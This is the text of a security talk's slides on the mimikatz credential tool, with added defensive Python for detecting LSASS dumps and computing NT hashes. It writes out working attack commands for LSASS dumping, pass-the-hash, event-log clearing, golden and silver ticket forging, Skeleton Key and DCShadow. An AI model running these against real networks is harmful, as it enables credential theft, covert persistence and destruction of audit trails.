Slide 1

Slide 1 text

mimikatz: A little tool to play with Windows security
Prashant Mahajan, Sense of Security, 31 August 18
Sense of Security Pty Ltd (ABN 14 098 237 908), @ITSecurityAU, www.senseofsecurity.com.au. Sydney: Level 8, 59 Goulburn Street, Sydney NSW 2000. Melbourne: Level 15, 401 Docklands Drive, Docklands VIC 3008. Tel. 1300 922 923, Intl. +61 2 9290 4444. Compliance, Protection & Business Confidence.

Slide 2

Slide 2 text

https://www.redbubble.com/people/gentilkiwi/portfolio

Slide 3

Slide 3 text

Mimikatz is: the Answer to the Ultimate Question of Life, the Universe, and Everything

Slide 4

Slide 4 text

Coffee :)

Slide 5

Slide 5 text

Minesweeper :)
https://twitter.com/M_haggis/status/1032798552517423105

Slide 6

Slide 6 text

mimikatz
https://github.com/gentilkiwi/mimikatz

Slide 7

Slide 7 text

Authors
• Benjamin DELPY: you can contact him on Twitter (@gentilkiwi) or by mail (benjamin [at] gentilkiwi.com), or visit his blog (http://blog.gentilkiwi.com/)
• Vincent LE TOUX: a few contributions to mimikatz, including the DCSync function in the lsadump module. You can contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com), or visit his website (http://www.mysmartlogon.com)

Slide 8

Slide 8 text

Agenda
• sekurlsa::logonpasswords
• Just scratching the surface on the capabilities
• SekurLSA module
• Event module
• DCSync
• Golden Ticket
• Silver Ticket
• Skeleton Key
• SIDHistory
• DCShadow

Slide 9

Slide 9 text

Credentials in Memory ?!
• After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory.
• This is meant to facilitate Single Sign-On (SSO), ensuring a user isn't prompted each time resource access is requested.
• The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication, among others.
https://adsecurity.org/?page_id=1821

Slide 10

Slide 10 text

Credential Data Chart
Benjamin Delpy posted an Excel chart on OneDrive (no longer available) listing which credential types each Windows version keeps in LSASS memory.
http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png

Slide 11

Slide 11 text

sekurlsa::logonpasswords

Slide 12

Slide 12 text

Malicious (the stock mimikatz binary is widely flagged by anti-virus)
https://twitter.com/gentilkiwi/status/937384097642635264
https://www.virustotal.com/#/file/e46ba4bdd4168a399ee5bc2161a8c918095fa30eb20ac88cac6ab1d6dbea2b4a/detection

Slide 13

Slide 13 text

EXE / PS1 / DLL
The same code can be run as a stand-alone executable, loaded as a DLL, or driven from PowerShell wrappers such as Invoke-Mimikatz; signature-based AV tends to key on the binary rather than the technique.
https://twitter.com/gentilkiwi/status/887823565046910977
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/

Slide 14

Slide 14 text

ProcDump or Task Manager
Dump LSASS with ProcDump (or Task Manager's "Create dump file") and parse the dump offline in mimikatz, so the mimikatz binary never has to touch the target host. Use a mimikatz build of the same architecture as the dumped LSASS (x64 for a 64-bit host).
procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
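The dump ProcDump writes is a Windows minidump, and attackers routinely rename lsass.dmp to something innocuous before exfiltrating it. The following is an added example, not code from the slides, from ProcDump or from mimikatz: a minimal parser for the minidump container that answers the DFIR question "is this file a memory dump of lsass.exe?" from the module list inside the file rather than from its name. The sample dump is constructed in build_sample_minidump (only the header, one stream directory entry and a ModuleListStream); real dumps carry many more streams, which the parser skips.

```python
"""Identify LSASS minidumps by content. Added example; sample dump is constructed."""
import struct

MDMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793          # low 16 bits of MINIDUMP_HEADER.Version
MODULE_LIST_STREAM = 4             # MINIDUMP_STREAM_TYPE.ModuleListStream
HEADER_FMT = "<4sIIIIIQ"           # Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIRECTORY_FMT = "<III"             # StreamType, Location.DataSize, Location.Rva
MODULE_SIZE = 108                  # sizeof(MINIDUMP_MODULE), packed
MODULE_NAME_RVA_OFFSET = 20        # after BaseOfImage(8) + SizeOfImage(4) + CheckSum(4) + TimeDateStamp(4)


def _read_minidump_string(data: bytes, rva: int) -> str:
    """MINIDUMP_STRING: ULONG32 byte length followed by UTF-16LE characters."""
    (nbytes,) = struct.unpack_from("<I", data, rva)
    return data[rva + 4: rva + 4 + nbytes].decode("utf-16-le", errors="replace")


def minidump_modules(data: bytes) -> list:
    """Return the module paths recorded in the ModuleListStream, or [] if the
    buffer is not a minidump. Every RVA is bounds-checked before use so a
    truncated or hostile file cannot raise."""
    if len(data) < struct.calcsize(HEADER_FMT):
        return []
    sig, version, nstreams, dir_rva, _cksum, _ts, _flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MDMP_SIGNATURE or (version & 0xFFFF) != MINIDUMP_VERSION:
        return []
    if dir_rva + 12 * nstreams > len(data):
        return []
    modules = []
    for i in range(nstreams):
        stype, _size, rva = struct.unpack_from(DIRECTORY_FMT, data, dir_rva + 12 * i)
        if stype != MODULE_LIST_STREAM or rva + 4 > len(data):
            continue
        (count,) = struct.unpack_from("<I", data, rva)
        for j in range(count):
            off = rva + 4 + MODULE_SIZE * j
            if off + MODULE_SIZE > len(data):
                break
            (name_rva,) = struct.unpack_from("<I", data, off + MODULE_NAME_RVA_OFFSET)
            if name_rva + 4 <= len(data):
                modules.append(_read_minidump_string(data, name_rva))
    return modules


def looks_like_lsass_dump(data: bytes) -> bool:
    """True when the dump's module list names lsass.exe as a loaded image."""
    return any(m.lower().endswith("\\lsass.exe") for m in minidump_modules(data))


def build_sample_minidump(module_paths) -> bytes:
    """Constructed test data, not a real dump: header | directory | module list | strings."""
    header_size, dir_size = struct.calcsize(HEADER_FMT), struct.calcsize(DIRECTORY_FMT)
    mod_list_rva = header_size + dir_size
    strings_rva = mod_list_rva + 4 + MODULE_SIZE * len(module_paths)
    strings, name_rvas = b"", []
    for path in module_paths:
        name_rvas.append(strings_rva + len(strings))
        enc = path.encode("utf-16-le")
        strings += struct.pack("<I", len(enc)) + enc + b"\x00\x00"
    modules = struct.pack("<I", len(module_paths))
    base = 0x7FF600000000
    for name_rva in name_rvas:
        # BaseOfImage, SizeOfImage, CheckSum, TimeDateStamp, ModuleNameRva, then zeroed remainder
        modules += struct.pack("<QIIII", base, 0x40000, 0, 0, name_rva) + b"\x00" * (MODULE_SIZE - 24)
        base += 0x100000
    directory = struct.pack(DIRECTORY_FMT, MODULE_LIST_STREAM, len(modules), mod_list_rva)
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, MINIDUMP_VERSION, 1, header_size, 0, 0, 0)
    return header + directory + modules + strings


if __name__ == "__main__":
    sample = build_sample_minidump([r"C:\Windows\System32\lsass.exe", r"C:\Windows\System32\ntdll.dll"])
    print(minidump_modules(sample), looks_like_lsass_dump(sample))
```

Point it at every file that matches the MDMP signature (not the .dmp extension) on a host or file share. A dump produced by an attacker tool that writes its own format will not match; that is a separate problem, and this check is cheap enough to run alongside a hash-based one.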

Slide 15

Slide 15 text

No Debug Privs ?!

Slide 16

Slide 16 text

No Debug Privs ?!
https://twitter.com/gentilkiwi/status/1032161555964723200
https://twitter.com/gentilkiwi/status/1032270189444911104

Slide 17

Slide 17 text

RunAsPPL
"The Local Security Authority (LSA), which resides within the Local Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed."
On Windows 8.1 / Server 2012 R2 and later the setting is the RunAsPPL DWORD under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; with it set to 1, LSASS runs as a Protected Process Light and an administrator's sekurlsa::logonpasswords fails to open the process.
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management

Slide 18

Slide 18 text

RunAsPPL
privilege::debug
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords :)
The !processprotect command is serviced by mimikatz's signed kernel driver (mimidrv), which must be loaded first (!+) and therefore needs local administrator rights. It clears the protection level on lsass.exe from kernel mode, after which the ordinary user-mode read succeeds. Loading the driver installs a kernel service, which is logged (System event 7045) and is the defender's opportunity.

Slide 19

Slide 19 text

SekurLSA module

Slide 20

Slide 20 text

Pass the Hash
sekurlsa::pth /user:da /domain:sos.labs /ntlm:eaabfdbde55b39c1a9b8d6786afd251e /run:powershell.exe
Starts powershell.exe under a new logon session whose cached credential material is replaced with the supplied hash, so network authentication from that process takes place as sos.labs\da without ever knowing the clear-text password. Because the NT hash is also the Kerberos RC4-HMAC key, the session can obtain Kerberos TGTs as well (overpass-the-hash); /aes128 and /aes256 can be given instead of /ntlm for AES-only environments.

Slide 21

Slide 21 text

Event module
privilege::debug   Get debug privs :)
event::drop        Patch the Events service so that no new events are written.
event::clear       Clear the event log without a log-cleared event (1102) being logged.

Slide 22

Slide 22 text

LSADump module

Slide 23

Slide 23 text

SAM: lsadump::sam reads the local account NT hashes from the SAM hive (live, after token::elevate, or offline from exported SAM and SYSTEM hive files).

Slide 24

Slide 24 text

Cache: lsadump::cache reads the cached domain logon verifiers (MSCache/DCC) from the SECURITY hive; they are salted and slow to crack, and cannot be used directly for pass-the-hash.

Slide 25

Slide 25 text

DCSync
lsadump::dcsync /domain:sos.labs /all /csv
Asks a domain controller to replicate account secrets over the Directory Replication Service (DRS) protocol, exactly as another DC would, so nothing has to run on the DC itself. The caller needs the replication rights on the domain object (Replicating Directory Changes and Replicating Directory Changes All), which Domain Admins, Enterprise Admins and DC computer accounts hold by default. /all /csv lists every account with its NT hash; a single account, such as krbtgt, can be requested with /user:.

Slide 26

Slide 26 text

kerberos module

Slide 27

Slide 27 text

https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf

Slide 28

Slide 28 text

Golden Ticket
• A Golden Ticket (GT) is a TGT that uses the KRBTGT NTLM password hash to encrypt and sign.
• A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
• Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History), since the TGT is used to get service tickets (TGS) used to access resources.
• The GT contains user group membership information (PAC) and is signed and encrypted using the domain's Kerberos service account (KRBTGT), which can only be opened and read by the KRBTGT account.
https://adsecurity.org/?page_id=1821

Slide 29

Slide 29 text

Golden Ticket
To summarize, once an attacker gets access to the KRBTGT key (NTLM/RC4, AES128 or AES256), they can create Golden Tickets (TGTs) that provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default (the RIDs below are appended to the domain SID given with /sid):
• Domain Users: S-1-5-21-<domain>-513
• Domain Admins: S-1-5-21-<domain>-512
• Schema Admins: S-1-5-21-<domain>-518
• Enterprise Admins: S-1-5-21-<domain>-519 (only effective when the forged ticket is created in the forest root domain; otherwise add the root domain's Enterprise Admins SID with the /sids parameter for AD forest admin rights)
• Group Policy Creator Owners: S-1-5-21-<domain>-520
https://adsecurity.org/?page_id=1821

Slide 30

Slide 30 text

Golden Ticket
kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt
• /user – account to be impersonated, or any username (it need not exist)
• /id – RID of the account to be impersonated. This could be a real account RID, such as the default Administrator RID of 500, or a fake one
• /sid – the domain SID to which the RIDs are appended
• /groups – list of group RIDs the account in the ticket will belong to
• /sids – extra SIDs to insert into the SIDHistory attribute of the account in the ticket
• /krbtgt – the KRBTGT NT hash (or an /aes128 / /aes256 key) used to encrypt and sign the ticket
• /ptt – Pass the Ticket: load the golden ticket into the current session instead of writing it to a .kirbi file
Without /endin the ticket lifetime defaults to 10 years, far beyond any domain's maximum ticket lifetime, which is one of the things a ticket review on a suspect host can look for.

Slide 31

Slide 31 text

Silver Ticket
A Silver Ticket is a forged TGS (service ticket, similar to a TGT in format) encrypted and signed with the NTLM password hash of the AD computer or service account that owns the target SPN. Because the client presents it straight to the service, the DC is never contacted (no 4768/4769 on the DC), which is what makes silver tickets quieter than golden tickets. Mimikatz adds the following groups to the ticket by default:
• Domain Users: S-1-5-21-<domain>-513
• Domain Admins: S-1-5-21-<domain>-512
• Schema Admins: S-1-5-21-<domain>-518
• Enterprise Admins: S-1-5-21-<domain>-519 (only effective when the forged ticket is created in the forest root domain; otherwise add the root domain's Enterprise Admins SID with the /sids parameter for AD forest admin rights)
• Group Policy Creator Owners: S-1-5-21-<domain>-520
https://adsecurity.org/?page_id=1821

Slide 32

Slide 32 text

Silver Ticket
kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /service:http /ptt
• /target – the host part of the SPN; in the sos.labs domain this is dc1.sos.labs
• /service – the service class of the SPN the ticket is for (http, cifs, ldap, host, ...); it must be a service actually running as the account whose key is supplied
• /user – the user the ticket will be created for; this can be any user account whatsoever, even one that does not exist
• /id – RID placed in the ticket for that user
• /groups – list of groups to which the account in the ticket will belong; Domain Admins is included by default
• /rc4 – NTLM hash of the service account (for a service running as the machine account, such as http on dc1.sos.labs, this is the computer account's hash), or /aes128 / /aes256 keys
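The /ntlm value on the Pass the Hash slide, the /krbtgt value on the Golden Ticket slide and the /rc4 value here are all the same kind of object: the account's NT hash, which Kerberos RC4-HMAC (RFC 4757) uses unchanged as the long-term key. The following is an added example, not code from the slides or from mimikatz, that derives that value from a password. MD4 is implemented inline (RFC 1320) because hashlib no longer exposes it on many builds; the passwords used are constructed test inputs.

```python
"""NT hash / RC4-HMAC Kerberos key from a password. Added example; MD4 per RFC 1320."""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 digest per RFC 1320: little-endian words, 64-byte blocks, three rounds."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    # (round function, message-word order, shift amounts, round constant)
    rounds = (
        (F, tuple(range(16)), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = [a, b, c, d]
        for fn, order, shifts, k in rounds:
            for i, w in enumerate(order):
                # Register roles rotate one place per step: (a,b,c,d) -> (d,a,b,c) -> ...
                ai, bi, ci, di = ((j - i) % 4 for j in range(4))
                r[ai] = _rotl((r[ai] + fn(r[bi], r[ci], r[di]) + X[w] + k) & _MASK, shifts[i % 4])
        a, b, c, d = ((x + y) & _MASK for x, y in zip((a, b, c, d), r))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """The NT hash as mimikatz prints it: MD4(UTF-16LE(password)), lower-case hex.
    There is no salt, so every account with the same password has the same hash."""
    return md4(password.encode("utf-16-le")).hex()


def kerberos_rc4_key(password: str) -> str:
    """RFC 4757: the RC4-HMAC long-term key is exactly the NT hash, so the 16
    bytes handed to /ntlm, /krbtgt and /rc4 are the same value."""
    return nt_hash(password)


if __name__ == "__main__":
    print(nt_hash("password"))          # 8846f7eaee8fb117ad06bdd830b7586c
    print(kerberos_rc4_key("password") == nt_hash("password"))
```

The practical uses are on the defensive side: confirming that a hash recovered from a dump or a DCSync export matches a known weak password, and understanding why rotating the krbtgt password twice (so that both the current and the previous key change) is what actually invalidates golden tickets. The AES keys mimikatz accepts with /aes128 and /aes256 are salted with the realm and principal name and cannot be obtained from the NT hash.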

Slide 33

Slide 33 text

Misc module

Slide 34

Slide 34 text

DisableCMD (the misc module's cmd command starts a command prompt even where the DisableCMD policy is set)

Slide 35

Slide 35 text

Clip (misc::clip reads the current clipboard contents, a common place for pasted passwords)

Slide 36

Slide 36 text

Skeleton Key
• Inject the Skeleton Key into the LSASS process on a Domain Controller (misc::skeleton, after privilege::debug; the DC must be running without RunAsPPL or the driver trick above is needed first).
• This enables all user authentication against the Skeleton Key patched DC to use a "master password" (mimikatz by default), aka the Skeleton Key, as well as the user's usual password, so existing credentials keep working and nothing breaks for users.
• The patch lives only in memory: a reboot of the DC removes the Skeleton Key injection.

Slide 37

Slide 37 text

Security Identifiers (SID) module (sid::lookup / sid::query to resolve names and SIDs; sid::patch the NTDS service on a DC, then sid::add or sid::modify to write a SIDHistory value directly into the directory, which normal LDAP writes refuse)

Slide 38

Slide 38 text

SIDHistory

Slide 39

Slide 39 text

SIDHistory

Slide 40

Slide 40 text

SIDHistory

Slide 41

Slide 41 text

DCShadow
• Start the mimidrv service (!+)
• Elevate to SYSTEM (!processtoken): the instance that registers the rogue DC has to run as SYSTEM so it can serve the RPC interfaces a real DC exposes

Slide 42

Slide 42 text

DCShadow

Slide 43

Slide 43 text

DCShadow: running as SYSTEM, this instance registers the attacker's machine as a DC in the configuration partition, stages the attribute change (lsadump::dcshadow /object: /attribute: /value:) and waits for a replication request

Slide 44

Slide 44 text

DCShadow: running as Domain Admin, a second instance triggers the replication (lsadump::dcshadow /push) so a legitimate DC pulls the staged change from the rogue one, after which the rogue DC registration is removed

Slide 45

Slide 45 text

DCShadow

Slide 46

Slide 46 text

DCShadow: what can you do?
• Add a user to privileged groups such as Domain Admins or Enterprise Admins
• Add SIDHistory
• Change PrimaryGroupID
• Etc.: any attribute the replication path will accept, written without the directory-service change events a normal LDAP write would produce on the real DC

Slide 47

Slide 47 text

DCShadow
The following permissions on AD objects are required (all held by Domain Admins by default, but they can be delegated to a lesser account, which is what the Set-DCShadowPermissions script below does):
Domain object
• DS-Install-Replica (Add/Remove Replica in Domain)
• DS-Replication-Manage-Topology (Manage Replication Topology)
• DS-Replication-Synchronize (Replication Synchronization)
Sites object in the Configuration container
• CreateChild and DeleteChild
Computer object of the attacker's machine (which is registered as a fake DC)
• WriteProperty
Target object (user, computer or ADSPath)
• WriteProperty
https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1

Slide 48

Slide 48 text


Slide 49

Slide 49 text

Privilege module (privilege::debug enables SeDebugPrivilege in the current token, which the LSASS reads above depend on)

Slide 50

Slide 50 text

Crypto Module

Slide 51

Slide 51 text

mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'
mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
mimikatz # crypto::keys /export
crypto::capi patches the CryptoAPI inside the mimikatz process and crypto::cng patches the KeyIso (CNG key isolation) service inside LSASS, so private keys that were marked non-exportable when they were created are exported anyway. Keys held in a TPM or smart card are not affected, since there is no key material in software to patch around.

Slide 52

Slide 52 text

net module

Slide 53

Slide 53 text

Process module

Slide 54

Slide 54 text

RPC module (rpc::server and rpc::connect let one mimikatz instance drive another remotely)

Slide 55

Slide 55 text

Service module

Slide 56

Slide 56 text

System Environment Value module (sysenv:: reads and writes UEFI firmware environment variables)

Slide 57

Slide 57 text

Token manipulation module (token::elevate impersonates a SYSTEM token, which is what lsadump::sam and lsadump::cache need on a live host)

Slide 58

Slide 58 text

Terminal Server module (ts::sessions lists RDP sessions; ts::multirdp patches the RDP service to allow more than one concurrent session)

Slide 59

Slide 59 text

IIS XML Config module (iis::apphost decrypts the encrypted sections, such as application pool and virtual directory passwords, in applicationHost.config)

Slide 60

Slide 60 text

Data Protection API module (dpapi::masterkey, dpapi::cred, dpapi::chrome and friends decrypt DPAPI-protected blobs; sekurlsa::dpapi pulls the cached master keys from LSASS and lsadump::backupkeys fetches the domain backup key that decrypts every domain user's master keys)

Slide 61

Slide 61 text

Questions?

Slide 62

Slide 62 text

Thank You!
© 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.